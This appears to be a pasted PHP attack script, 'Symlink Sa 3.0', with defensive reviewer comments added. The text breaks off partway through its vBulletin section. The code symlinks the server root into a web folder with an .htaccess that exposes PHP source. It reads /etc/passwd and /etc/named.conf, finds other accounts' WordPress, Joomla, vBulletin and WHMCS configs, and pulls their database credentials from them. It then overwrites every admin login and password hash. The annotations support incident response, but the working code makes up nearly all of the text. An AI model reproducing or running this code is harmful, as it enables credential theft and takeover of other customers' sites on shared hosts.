Auto Symlink

From BX404, 2 Years ago, written in Plain Text, viewed 1'044 times.
  1. <?php
     // Reviewer annotation (defensive analysis): request preamble. Removes the execution time limit,
     // silences PHP error reporting, then derives two base URLs from server variables.
  2. set_time_limit(0);
  3. error_reporting(0);
     // $pageURL = http://<SERVER_NAME><REQUEST_URI> with the last "/"-separated segment removed.
     // str_replace() strips every occurrence of that segment's text, not only the trailing one.
     // Neither server variable is validated here; further down the file $pageURL is concatenated into
     // URLs passed to get_headers() and into echoed HTML.
  4. $pageURL = 'http://'.$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
  5. $u = explode("/",$pageURL );
  6. $pageURL =str_replace($u[count($u)-1],"",$pageURL );
     // Same construction for an ftp:// URL rooted at /public_html/. In the visible part of the file
     // it is only used for the "FTP" links printed by the 'passwd' action.
  7. $pageFTP = 'ftp://'.$_SERVER["SERVER_NAME"].'/public_html/'.$_SERVER["REQUEST_URI"];
  8. $u = explode("/",$pageFTP );
  9. $pageFTP =str_replace($u[count($u)-1],"",$pageFTP );
  10. ?>
  11.  <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
  12.    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
  13.  
  14. <html xmlns="http://www.w3.org/1999/xhtml">
  15. <head>
  16. <title>Symlink_Sa 3.0</title>
  17. <style type="text/css">
  18.  html,body {
  19.     margin: 0;
  20.     padding: 0;
  21.     outline: 0;
  22. }
  23. a{
  24.  
  25. font-size: 13px;
  26.  
  27. }
  28.  
  29.  
  30. body {
  31.    direction: ltr;
  32.    background-color:#F4F4F4;
  33.     color: rgb(153, 153, 153);
  34.    text-align: center
  35. }
  36.  
  37.  
  38.  
  39. input,textarea,select{
  40. font-weight: bold;
  41. color: #000000;
  42. }
  43.  
  44. input,textarea,select:hover{
  45. box-shadow: 0px 0px 4px #AAAAAA;
  46. }
  47.  
  48.  
  49. .hedr {
  50.  font-family: Tahoma, Arial, sans-serif  ;
  51.  font-size: 22px;
  52.  
  53.  
  54. }
  55.  
  56. .cont a{
  57.  
  58. text-decoration: none;
  59. color:rgb(153, 153, 153);
  60. font-family: Tahoma, Arial, sans-serif  ;
  61. font-size: 16px;
  62. text-shadow: 0px 0px 3px ;
  63. }
  64.  
  65. .cont a:hover{
  66.  
  67.  
  68.  color: #EEEEEE ;
  69.  text-shadow:0px 0px 3px #000000 ;
  70.  
  71.  
  72. }
  73.  
  74. .tmp tr td{
  75.  
  76. border: solid 1px #BBBBBB;
  77.  
  78. padding: 2px ;
  79.  font-size: 13px;
  80. }
  81.  
  82. .tmp tr td a {
  83.  text-decoration: none;
  84.  
  85.  
  86.  
  87. }
  88.  
  89. .foter{
  90.  font-size: 9pt;
  91.  color: #AAAAAA ;
  92.  text-align: center
  93. }
  94.  
  95. .tmp tr td:hover{
  96.  
  97. box-shadow: 0px 0px 4px #888888;
  98.  
  99. }
  100. .fot{
  101.  
  102. font-family:Tahoma, Arial, sans-serif;
  103.  
  104.  font-size: 11pt;
  105. }
  106. .for a : hover{
  107.  
  108. text-shadow: 0px 0px 1px #3366FF;
  109.  
  110. }
  111.  
  112.  
  113. .ir {
  114.  color: #FF0000;
  115. }
  116. </style>
  117. </head>
  118. <body>
  119. <div class='all'>
  120. <?php
  121. // Reviewer annotation (defensive analysis). This run executes on every request, before the
       // ?sws= dispatch that follows it. It stages a web-readable view of the filesystem root
       // beside the script. Host artefacts created here: directory "sym" (mode 0777 requested,
       // subject to umask), file "sym/.htaccess" with the directives below, symlink "sym/root" -> "/".
       // Actions further down the file add more artefacts in the same directory: "sym1/" with its own
       // .htaccess ('file'), and the working files named.txt, passwd.txt, joomla.txt, wp.txt, vb.txt.
       // Incident-response relevance of the later actions, as written in this file: 'joomla' and 'wp'
       // parse DB credentials out of other accounts' config files and overwrite the login/password
       // columns of every row in the users table; 'vb' overwrites the template row titled 'FAQ' with
       // an eval(gzinflate(base64_decode(...))) payload. If this script is found on a shared host,
       // presumably every config file readable through sym/root should be treated as exposed
       // (rotate DB credentials, review CMS admin accounts and vBulletin templates) - confirm per host.
  122. @mkdir('sym',0777);
       // The .htaccess asks Apache for "Options all" in this directory (which covers following
       // symlinks) and maps .php/.html to text/plain and non-PHP handlers, so linked scripts are
       // returned as source text instead of being executed; the last two directives target access
       // control. These lines only take effect where the vhost's AllowOverride permits per-directory
       // Options/FileInfo/AuthConfig. Usual hardening: restrict AllowOverride, enforce
       // SymLinksIfOwnerMatch in server config, and list symlink in PHP's disable_functions.
  123. $htcs  = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  124. $f =@fopen ('sym/.htaccess','w');
  125. fwrite($f , $htcs);
  126. // Detection hint: a symlink whose target is "/" inside a document root is a strong indicator
  127. // on its own; it is (re)attempted here on each request and again inside the 'sym' action.
  128.  
  129. @symlink("/","sym/root");
  130. // $pg holds this script's own file name; later forms use it in their action="" attribute.
  131. $pg = basename(__FILE__);
  132. // Static banner and navigation menu follow.
  133. echo '<br /><div class="hedr"> Symlink Sa 3.0 <br /></div>' ;
  134.  
  135. echo '<br /><div class="hedr">-:[ User & Domains & Symlink ]:-<br /><br /></div>' ;
  136. // Each menu link selects an action through the "sws" request parameter (sym, sec, file, passwd,
       // read, joomla, wp, vb, help). The dispatcher reads $_REQUEST['sws'], so the value may also arrive
       // outside the query string; access-log searches for "sws=" will catch the GET form of these requests.
  137. echo '<div class="cont">
  138.  
  139. [<a href="?"> Home </a>]
  140.  
  141. [<a href="?sws=sym"> User & Domains & Symlink </a>]
  142.  
  143. [<a href="?sws=sec"> Domains & Script </a>]
  144.  
  145. [ <a href="?sws=file"> Symlink File </a>]
  146.  
  147. [<a href="?sws=passwd"> Symlink Bypass </a>]
  148.  
  149. <br /><br />
  150.  
  151. [ <a href="?sws=read"> Bypass Read </a>]
  152.  
  153. [ <a href="?sws=joomla"> Mass Joomla </a>]
  154.  
  155. [ <a href="?sws=wp"> Mass WordPress </a>]
  156.  
  157. [ <a href="?sws=vb"> Mass vBulletin </a>]
  158.  
  159. [ <a href="?sws=help"> Help </a>]
  160.  
  161. <br /><br /><br />
  162.  
  163.  
  164.  
  165.  
  166.  
  167.  
  168. </div>';
  169.  
  170. if(isset($_REQUEST['sws']))
  171. {
  172.  
  173. switch ($_REQUEST['sws'])
  174. {
  175.  
  176.  
  177.  
  178.  
  179.  
  180. /// Domains + Scripts  ///
  181.  
  182. case 'sec':
  183.  
  184. if(!@is_file('named.txt')){
  185.  
  186. $d00m = @file("/etc/named.conf");
  187.  
  188. }else{
  189.  
  190. $d00m = @file("named.txt");
  191.  
  192.  
  193. }
  194. if(!$d00m)
  195. {
  196.  
  197.                die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
  198. }
  199. else
  200.  
  201. {
  202. echo "<div class='tmp'>
  203. <table align='center' width='40%'><td> Domains </td><td> Script </td>";
  204. foreach($d00m as $dom){
  205.  
  206. flush();
  207. flush();
  208.  
  209.  
  210.  
  211. if(eregi("zone",$dom)){
  212.  
  213. @preg_match_all('#zone "(.*)"#', $dom, $domsws);
  214.  
  215. flush();
  216.  
  217. if(@strlen(trim($domsws[1][0])) > 2){
  218.  
  219. $user = @posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
  220.  
  221. ///////////////////////////////////////////////////////////////////////////////////
  222.  
  223. $wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/wp-config.php";
  224. $wpp=@get_headers($wpl);
  225. $wp=$wpp[0];
  226.  
  227. $wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/wp-config.php";
  228. $wpp2=@get_headers($wp2);
  229. $wp12=$wpp2[0];
  230.  
  231. ///////////////////////////////
  232.  
  233. $jo1=$pageURL."/sym/root/home/".$user['name']."/public_html/configuration.php";
  234. $joo=@get_headers($jo1);
  235. $jo=$joo[0];
  236.  
  237.  
  238. $jo2=$pageURL."/sym/root/home/".$user['name']."/public_html/joomla/configuration.php";
  239. $joo2=@get_headers($jo2);
  240. $jo12=$joo2[0];
  241.  
  242. ////////////////////////////////
  243.  
  244. $vb1=$pageURL."/sym/root/home/".$user['name']."/public_html/includes/config.php";
  245. $vbb=@get_headers($vb1);
  246. $vb=$vbb[0];
  247.  
  248. $vb2=$pageURL."/sym/root/home/".$user['name']."/public_html/vb/includes/config.php";
  249. $vbb2=@get_headers($vb2);
  250. $vb12=$vbb2[0];
  251.  
  252. $vb3=$pageURL."/sym/root/home/".$user['name']."/public_html/forum/includes/config.php";
  253. $vbb3=@get_headers($vb3);
  254. $vb13=$vbb3[0];
  255.  
  256. /////////////////
  257.  
  258. $wh1=$pageURL."/sym/root/home/".$user['name']."public_html/clients/configuration.php";
  259. $whh2= @get_headers($wh1);
  260. $wh=$whh2[0];
  261.  
  262. $wh2=$pageURL."/sym/root/home/".$user['name']."/public_html/support/configuration.php";
  263. $whh2= @get_headers($wh2);
  264. $wh12=$whh2[0];
  265.  
  266. $wh3=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php";
  267. $whh3= @get_headers($wh3);
  268. $wh13=$whh3[0];
  269.  
  270. $wh5=$pageURL."/sym/root/home/".$user['name']."/public_html/submitticket.php";
  271. $whh5= @get_headers($wh5);
  272. $wh15=$whh5[0];
  273.  
  274. $wh4=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php";
  275. $whh4= @get_headers($wh4);
  276. $wh14=$whh4[0];
  277.  
  278.  
  279.  
  280. ////////////////////////////////////////////////////////////////////////////////
  281.  
  282. ////////// Wordpress ////////////
  283.  
  284. $pos = strpos($wp, "200");
  285. $config="&nbsp;";
  286.  
  287. if (strpos($wp, "200") == true )
  288. {
  289. $config="<a href='".$wpl."' target='_blank'>Wordpress</a>";
  290. }
  291. elseif (strpos($wp12, "200") == true)
  292. {
  293.  $config="<a href='".$wp2."' target='_blank'>Wordpress</a>";
  294. }
  295.  
  296. ///////////WHMCS////////
  297.  
  298. elseif (strpos($jo, "200")  == true and strpos($wh15, "200")  == true )
  299. {
  300.  $config=" <a href='".$wh5."' target='_blank'>WHMCS</a>";
  301.  
  302. }
  303. elseif (strpos($wh12, "200")  == true)
  304. {
  305.  $config =" <a href='".$wh2."' target='_blank'>WHMCS</a>";
  306. }
  307.  
  308. elseif (strpos($wh13, "200")  == true)
  309. {
  310.  $config =" <a href='".$wh3."' target='_blank'>WHMCS</a>";
  311.  
  312. }
  313.  
  314. ///////// Joomla to 4 ///////////
  315.  
  316. elseif (strpos($jo, "200")  == true)
  317. {
  318.  $config=" <a href='".$jo1."' target='_blank'>Joomla</a>";
  319. }
  320.  
  321. elseif (strpos($jo12, "200")  == true)
  322. {
  323.  $config=" <a href='".$jo2."' target='_blank'>Joomla</a>";
  324. }
  325.  
  326. //////////vBulletin to 4 ///////////
  327.  
  328. elseif (strpos($vb, "200")  == true)
  329. {
  330.  $config=" <a href='".$vb1."' target='_blank'>vBulletin</a>";
  331. }
  332.  
  333. elseif (strpos($vb12, "200")  == true)
  334. {
  335.  $config=" <a href='".$vb2."' target='_blank'>vBulletin</a>";
  336. }
  337.  
  338. elseif (strpos($vb13, "200")  == true)
  339. {
  340.  $config=" <a href='".$vb3."' target='_blank'>vBulletin</a>";
  341. }
  342.  
  343. else
  344. {
  345. continue;
  346. }
  347. flush();
  348. flush();
  349.  
  350. /////////////////////////////////////////////////////////////////////////////////////
  351.  
  352.  
  353.  
  354. $site = $user['name'] ;
  355.  
  356.  
  357.  
  358. flush();
  359.  
  360. echo "<tr><td><a href=http://www.".$domsws[1][0]."/>".$domsws[1][0]."</a></td>
  361. <td>".$config."</td></tr>"; flush();
  362.  
  363. }
  364. }
  365. }
  366. }
  367.  
  368.  
  369.  
  370.  
  371. break;
  372.  
  373.  
  374. /// user + domine + symlink  ///
  375.  
  376. case 'sym':
  377.  
  378. if(!is_file('named.txt')){
  379.  
  380. $d00m = @file("/etc/named.conf");
  381.  
  382. }else{
  383.  
  384. $d00m = @file("named.txt");
  385.  
  386.  
  387. }
  388. if(!$d00m)
  389. {
  390.  
  391.                die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
  392. }
  393. else
  394.  
  395. {
  396. echo "<div class='tmp'><table align='center' width='40%'><td>Domains</td><td>Users</td><td>symlink </td>";
  397. foreach($d00m as $dom){
  398.  
  399. if(eregi("zone",$dom)){
  400.  
  401. preg_match_all('#zone "(.*)"#', $dom, $domsws);
  402.  
  403. flush();
  404.  
  405. if(strlen(trim($domsws[1][0])) > 2){
  406.  
  407. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
  408.  
  409. flush();
  410.  
  411.  
  412.  
  413. $site = $user['name'] ;
  414.  
  415.  
  416. @symlink("/","sym/root");
  417.  
  418. $site = $domsws[1][0];
  419.  
  420. $ir = 'ir';
  421.  
  422. $il = 'il';
  423.  
  424. if (preg_match("/.^$ir/",$domsws[1][0]) or preg_match("/.^$il/",$domsws[1][0]) )
  425. {
  426. $site = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$domsws[1][0]."</div>";
  427. }
  428.  
  429.  
  430. echo "
  431. <tr>
  432.  
  433. <td>
  434. <div class='dom'><a target='_blank' href=http://www.".$domsws[1][0]."/>".$site." </a> </div>
  435. </td>
  436.  
  437.  
  438. <td>
  439. ".$user['name']."
  440. </td>
  441.  
  442.  
  443.  
  444.  
  445.  
  446.  
  447. <td>
  448. <a href='sym/root/home/".$user['name']."/public_html' target='_blank'>symlink </a>
  449. </td>
  450.  
  451.  
  452. </tr></div> ";
  453.  
  454.  
  455. flush();
  456. flush();
  457.  
  458. }
  459. }
  460. }
  461. }
  462.  
  463.  
  464.  
  465.  
  466. break;
  467.  
  468.  
  469. /// file  symlink ///
  470.  
  471. case 'file':
  472.  
  473. echo'
  474. The file path to symlink
  475.  
  476. <br /><br />
  477. <form method="post">
  478. <input type="text" name="file" value="/home/user/public_html/file.name" size="60"/><br /><br />
  479. <input type="text" name="symfile" value="file.name_sym ( Ex. :: royaliste.txt )" size="60"/><br /><br />
  480. <input type="submit" value="symlink" name="symlink" /> <br /><br />
  481.  
  482.  
  483.  
  484. </form>
  485. ';
  486.  
  487. $pfile = $_POST['file'];
  488. $symfile = $_POST['symfile'];
  489. $symlink = $_POST['symlink'];
  490.  
  491. if ($symlink)
  492. {
  493.  
  494.  
  495. @mkdir('sym1',0777);
  496. $c  = "Options Indexes FollowSymLinks \n DirectoryIndex ssssss.htm \n AddType txt .php \n AddHandler txt .php \n  AddType txt .html \n AddHandler txt .html \n Options all \n Options \n Allow from all \n Require None \n Satisfy Any";
  497. $f =@fopen ('sym1/.htaccess','w');
  498. @fwrite($f , $c);
  499.  
  500. @symlink("$pfile","sym1/$symfile");
  501.  
  502. echo '<br /><a target="_blank" href="sym1/'.$symfile.'" >'.$symfile.'</a>';
  503.  
  504. }
  505.  
  506.  
  507.  
  508. break;
  509.  
  510. /// bypass read
  511.  
  512. case 'read':
  513.  
  514. echo "read /etc/named.conf";
  515. echo "<br /><br /><form method='post' action='?sws=read&save=1'><textarea cols='80' rows='20' name='file'>";
  516. flush();
  517. flush();
  518.  
  519.  
  520. $file = '/etc/named.conf';
  521.  
  522.  
  523. $r3ad = @fopen($file, 'r');
  524. if ($r3ad){
  525. $content = @fread($r3ad, @filesize($file));
  526. echo "".htmlentities($content)."";
  527. }
  528. else if (!$r3ad)
  529. {
  530. $r3ad = @show_source($file) ;
  531. }
  532. else if (!$r3ad)
  533. {
  534. $r3ad = @highlight_file($file);
  535. }
  536. else if (!$r3ad)
  537. {
  538. $sm = @symlink($file,'sym.txt');
  539.  
  540.  
  541. if ($sm){
  542. $r3ad = @fopen('sym/sym.txt', 'r');
  543. $content = @fread($r3ad, @filesize($file));
  544. echo "".htmlentities($content)."";
  545.  
  546. }
  547. }
  548.  
  549.  
  550.  
  551. echo "</textarea><br /><br /><input  type='submit' value='Save'/> </form>";
  552.  
  553.  
  554. if(isset($_GET['save'])){
  555.  
  556.  
  557. $cont = stripcslashes($_POST['file']);
  558.  
  559. $f = fopen('named.txt','w');
  560.  
  561. $w = fwrite($f,$cont);
  562.  
  563.                  if($w){
  564.  
  565.                  echo '<br />save has been successfully';
  566.  
  567.                  }
  568.  
  569. fclose($f);
  570.  
  571.  
  572.  
  573.  
  574. }
  575.  
  576.  
  577.  
  578. break;
  579.  
  580. // passwd
  581.  
  582. case 'passwd':
  583.  
  584. if(isset($_GET['save']) and isset($_POST['file']) or @filesize('passwd.txt') > 0){
  585.  
  586.  
  587. $cont = stripcslashes($_POST['file']);
  588.  
  589. if(!file_exists('passwd.txt')){
  590.  
  591. $f = @fopen('passwd.txt','w');
  592.  
  593. $w = @fwrite($f,$cont);
  594.  
  595. fclose($f);
  596. }
  597. if($w or @filesize('passwd.txt') > 0){
  598. // * SHOW * //
  599.  
  600. echo "<div class='tmp'><table align='center' width='35%'><td>Users</td><td>symlink</td><td>FTP</td>";
  601. flush();
  602.  
  603. $fil3 = file('passwd.txt');
  604.  
  605. foreach ($fil3 as $f){
  606.  
  607.     $u=explode(':', $f);
  608.     $user = $u['0'];
  609.  
  610.  
  611.  
  612. echo "
  613. <tr>
  614.  
  615.  
  616.  
  617. <td width='15%'>
  618. $user
  619. </td>
  620.  
  621.  
  622.  
  623.  
  624.  
  625.  
  626. <td width='10%'>
  627. <a href='sym/root/home/$user/public_html' target='_blank'>Symlink </a>
  628. </td>
  629.  
  630. <td width='10%'>
  631. <a href='$pageFTP/sym/root/home/$user/public_html' target='_blank'>FTP</a>
  632. </td>
  633.  
  634.  
  635.  
  636. </tr></div> ";
  637.  
  638.  
  639. flush();
  640. flush();
  641.  
  642.  
  643. }
  644.  
  645.  
  646.  
  647.  
  648.  
  649.  
  650. die ("</tr></div>");
  651.  
  652.  
  653.                  }
  654.  
  655.  
  656.  
  657.  
  658.  
  659. }
  660.  
  661.  
  662.  
  663. echo "read /etc/passwd";
  664. echo "<br /><br /><form method='post' action='?sws=passwd&save=1'><textarea cols='80' rows='20' name='file'>";
  665. flush();
  666.  
  667. $file = '/etc/passwd';
  668.  
  669.  
  670. $r3ad = @fopen($file, 'r');
  671. if ($r3ad){
  672. $content = @fread($r3ad, @filesize($file));
  673. echo "".htmlentities($content)."";
  674. }
  675. elseif(!$r3ad)
  676. {
  677. $r3ad = @show_source($file) ;
  678. }
  679. elseif(!$r3ad)
  680. {
  681. $r3ad = @highlight_file($file);
  682. }
  683. elseif(!$r3ad)
  684. {
  685.  
  686.                                            for($uid=0;$uid<1000;$uid++){
  687.                                             $ara = posix_getpwuid($uid);
  688.                                               if (!empty($ara)) {
  689.                                                  while (list ($key, $val) = each($ara)){
  690.                                                    print "$val:";
  691.                                                  }
  692.                                                  print "\n";
  693.                                                 }
  694.  
  695.                                        }
  696.  
  697. }
  698.  
  699.  
  700. flush();
  701.  
  702.  
  703. echo "</textarea><br /><br /><input  type='submit' value='&nbsp;&nbsp;symlink&nbsp;&nbsp;'/> </form>";
  704. flush();
  705.  
  706. break;
  707.  
  708.  
  709.  
  710. case 'joomla':
  711.  
  712. /////////////////////////////////////////////////////////////////// xxxxxxxxxxxxxxxxxxx ////////////////////////////
  713.  
  714.  
  715. if(isset($_POST['s'])){
  716.  
  717. $file = @file_get_contents('joomla.txt');
  718.  
  719. $ex   = explode("\n",$file);
  720.  
  721. echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
  722. flush();
  723.  
  724.  
  725. foreach ($ex as $exp){
  726.  
  727. $es   = explode("||",$exp);
  728.  
  729. $config = $es[0];
  730.  
  731. $domin = $es[1];
  732.  
  733. $domins = trim($domin).'';
  734.  
  735. $readconfig  = @file_get_contents(trim($config));
  736.  
  737. if(ereg('JConfig',$readconfig)){
  738.  
  739.  
  740.  
  741. $pass    =  ex($readconfig,'$password = \'',"';");
  742.  
  743. $userdb  =  ex($readconfig,'$user = \'',"';");
  744.  
  745. $db      =  ex($readconfig,'$db = \'',"';");
  746.  
  747. $fix     =  ex($readconfig,'$dbprefix = \'',"';");
  748.  
  749. $tab     =  $fix.'users';
  750.  
  751.  
  752. $con     = @mysql_connect('localhost',$userdb,$pass);
  753.  
  754. $db      = @mysql_select_db($db,$con);
  755.  
  756. $query   = @mysql_query("UPDATE `$tab`  SET `username` ='admin'");
  757.  
  758.  
  759. $query3  = @mysql_query("UPDATE `$tab`  SET `password` ='9cdfb439c7876e703e307864c9167a15'");
  760.  
  761.  
  762. if ($query and $query3 ){$r = '<b style="color: #006600">Succeed </b>user [admin] pass [lol]</b>';}else{$r = '<b style="color:red">failed</b>';}
  763.  
  764. $domins = trim($domin).'';
  765.  
  766. echo "<tr>
  767. <td><a target='_blank' href='http://$domins'>$domin</a></td>
  768. <td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";
  769. flush();
  770.  
  771.  
  772.  
  773. }else{
  774.  
  775. echo "<tr>
  776. <td><a target='_blank' href='http://$domins'>$domin</a></td>
  777. <td><a target='_blank' href='http://$exp'>config</a></td><td><b style='color:red'>failed</b></td></tr>";
  778. flush();
  779.  
  780. }
  781.  
  782. }
  783.  
  784.  
  785.  
  786.  
  787.  
  788.  
  789.  
  790.  
  791.  
  792. die();
  793.  
  794. }
  795.  
  796. if(!is_file('named.txt')){
  797.  
  798. $d00m = @file("/etc/named.conf");
  799.  
  800. flush();
  801.  
  802.  
  803. }else{
  804.  
  805. $d00m = file("named.txt");
  806.  
  807.  
  808. }
  809. if(!$d00m)
  810. {
  811.  
  812.                die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
  813. }
  814. else
  815.  
  816. {
  817. echo "<div class='tmp'>
  818. <form method='POST' action='$pg?sws=joomla'>
  819. <input type='submit' value='Mass ching Admin' />
  820. <input type='hidden' value='1' name='s' />
  821. </form><br /><br />
  822. <table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";
  823.  
  824. $f = fopen('joomla.txt','w');
  825.  
  826. foreach($d00m as $dom){
  827.  
  828. if(eregi("zone",$dom)){
  829.  
  830. preg_match_all('#zone "(.*)"#', $dom, $domsws);
  831.  
  832. if(strlen(trim($domsws[1][0])) > 2){
  833.  
  834. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
  835.  
  836. ///////////////////////////////////////////////////////////////////////////////////
  837.  
  838. $wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/configuration.php";
  839. $wpp=get_headers($wpl);
  840. $wp=$wpp[0];
  841.  
  842. $wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/configuration.php";
  843. $wpp2=get_headers($wp2);
  844. $wp12=$wpp2[0];
  845.  
  846. $wp3=$pageURL."/sym/root/home/".$user['name']."/public_html/joomla/configuration.php";
  847. $wpp3=get_headers($wp3);
  848. $wp13=$wpp3[0];
  849.  
  850.  
  851. ////////// joomla ////////////
  852.  
  853. $pos = strpos($wp, "200");
  854. $config="&nbsp;";
  855.  
  856. if (strpos($wp, "200") == true )
  857. {
  858. $config= $wpl;
  859. }
  860. elseif (strpos($wp12, "200") == true)
  861. {
  862.  $config= $wp2;
  863. }
  864. elseif (strpos($wp13, "200") == true)
  865. {
  866.  $config= $wp3;
  867. }
  868. else
  869. {
  870. continue;
  871.  
  872. }
  873. flush();
  874.  
  875. /////////////////////////////////////////////////////////////////////////////////////
  876.  
  877. $dom = $domsws[1][0];
  878.  
  879. $w = fwrite($f,"$config||$dom \n");
  880. if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:red">failed</b>';}
  881.  
  882.  
  883. echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
  884. <td><a href='$config'>config</a></td><td>".$r."</td></tr>";
  885.  
  886.  
  887.  
  888.  
  889.  
  890. flush();
  891.  
  892.  
  893. }
  894. }
  895. }
  896. }
  897.  
  898.  
  899. break;
  900.  
  901. case 'wp':
  902.  
  903. ############################ index #########################3
  904.  
  905.  
  906.  
  907.  
  908.  
  909.  
  910. ########  admin ##########33
  911.  
  912. if(isset($_POST['s'])){
  913.  
  914. $file = @file_get_contents('wp.txt');
  915.  
  916. $ex   = explode("\n",$file);
  917.  
  918. echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
  919. flush();
  920. flush();
  921.  
  922.  
  923. foreach ($ex as $exp){
  924.  
  925. $es   = explode("||",$exp);
  926.  
  927. $config = $es[0];
  928.  
  929. $domin = $es[1];
  930.  
  931. $domins = trim($domin).'';
  932.  
  933. $readconfig  = @file_get_contents(trim($config));
  934.  
  935. if(ereg('wp-settings.php',$readconfig)){
  936.  
  937.  
  938.  
  939. $pass    =  ex($readconfig,"define('DB_PASSWORD', '","');");
  940.  
  941. $userdb  =  ex($readconfig,"define('DB_USER', '","');");
  942.  
  943. $db      =  ex($readconfig,"define('DB_NAME', '","');");
  944.  
  945. $fix     =  ex($readconfig,'$table_prefix  = \'',"';");
  946.  
  947. $tab     = $fix.'users';
  948.  
  949. $con     = @mysql_connect('localhost',$userdb,$pass);
  950.  
  951. $db      = @mysql_select_db($db,$con);
  952.  
  953. $query   = @mysql_query("UPDATE `$tab` SET `user_login` ='sec-w.com'") or die;
  954.  
  955. $query   = @mysql_query("UPDATE `$tab` SET `user_pass` ='$1$4z/.5i..$9aHYB.fUHEmNZ.eIKYTwx/'") or die;
  956.  
  957.  
  958.  
  959. if ($query){$r = '<b style="color: #006600">Succeed </b>user [sec-w.com] pass [1]</b>';}
  960.  
  961. else
  962.  
  963. {
  964.  
  965. $r = '<b style="color:red">failed</b>';
  966.  
  967. }
  968.  
  969. $domins = trim($domin).'';
  970.  
  971. echo "<tr>
  972. <td><a target='_blank' href='http://$domins'>$domin</a></td>
  973. <td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";
  974.  
  975. flush();
  976. flush();
  977.  
  978.  
  979.  
  980.  
  981.  
  982.  
  983. }else{
  984.  
  985. echo "<tr>
  986. <td><a target='_blank' href='http://$domins'>$domin</a></td>
  987. <td><a target='_blank' href='http://$config'>config</a></td><td><b style='color:red'>failed2</b></td></tr>";
  988.  
  989. flush();
  990. flush();
  991.  
  992. }
  993.  
  994. }
  995.  
  996.  
  997.  
  998.  
  999.  
  1000.  
  1001.  
  1002.  
  1003.  
  1004.  
  1005. die();
  1006.  
  1007. }
  1008.  
  1009. if(!is_file('named.txt')){
  1010.  
  1011. $d00m = @file("/etc/named.conf");
  1012.  
  1013. }else{
  1014.  
  1015. $d00m = @file("named.txt");
  1016.  
  1017.  
  1018. }
  1019. if(!$d00m)
  1020. {
  1021.  
  1022.                die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
  1023. }
  1024. else
  1025.  
  1026. {
  1027. echo "<div class='tmp'>
  1028. <form method='POST' action='$pg?sws=wp'>
  1029. <input type='submit' value='Mass Change Admin' />
  1030. <input type='hidden' value='1' name='s' />
  1031. </form>
  1032. <br /><br />
  1033. <table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";
  1034.  
  1035. flush();
  1036. flush();
  1037.  
  1038. $f = fopen('wp.txt','w');
  1039.  
  1040. foreach($d00m as $dom){
  1041.  
  1042. if(eregi("zone",$dom)){
  1043.  
  1044. preg_match_all('#zone "(.*)"#', $dom, $domsws);
  1045.  
  1046. if(strlen(trim($domsws[1][0])) > 2){
  1047.  
  1048. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
  1049.  
  1050. ///////////////////////////////////////////////////////////////////////////////////
  1051.  
  1052. $wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/wp-config.php";
  1053. $wpp=get_headers($wpl);
  1054. $wp=$wpp[0];
  1055.  
  1056. $wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/wp-config.php";
  1057. $wpp2=get_headers($wp2);
  1058. $wp12=$wpp2[0];
  1059.  
  1060. $wp3=$pageURL."/sym/root/home/".$user['name']."/public_html/wp/wp-config";
  1061. $wpp3=get_headers($wp3);
  1062. $wp13=$wpp3[0];
  1063.  
  1064.  
  1065. ////////// wp ////////////
  1066.  
  1067. $pos = strpos($wp, "200");
  1068. $config="&nbsp;";
  1069.  
  1070. if (strpos($wp, "200") == true )
  1071. {
  1072. $config= $wpl;
  1073. }
  1074. elseif (strpos($wp12, "200") == true)
  1075. {
  1076.  $config= $wp2;
  1077. }
  1078. elseif (strpos($wp13, "200") == true)
  1079. {
  1080.  $config= $wp3;
  1081. }
  1082. else
  1083. {
  1084. continue;
  1085.  
  1086. }
  1087. flush();
  1088.  
  1089. /////////////////////////////////////////////////////////////////////////////////////
  1090.  
  1091. $dom = $domsws[1][0];
  1092.  
  1093. $w = fwrite($f,"$config||$dom \n");
  1094. if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:red">failed</b>';}
  1095.  
  1096.  
  1097. echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
  1098. <td><a href='$config'>config</a></td><td>".$r."</td></tr>";
  1099. flush();
  1100. flush();
  1101.  
  1102.  
  1103.  
  1104.  
  1105.  
  1106. flush();
  1107.  
  1108.  
  1109. }
  1110. }
  1111. }
  1112. }
  1113.  
  1114.  
  1115. break;
  1116.  
  1117.  
  1118. case 'vb':
  1119.  
  1120.  
  1121. if(isset($_POST['s'])){
  1122.  
  1123.  
  1124.  
  1125. $file = @file_get_contents('vb.txt');
  1126.  
  1127. $ex   = explode("\n",$file);
  1128.  
  1129. echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
  1130.  
  1131.  
  1132. foreach ($ex as $exp){
  1133.  
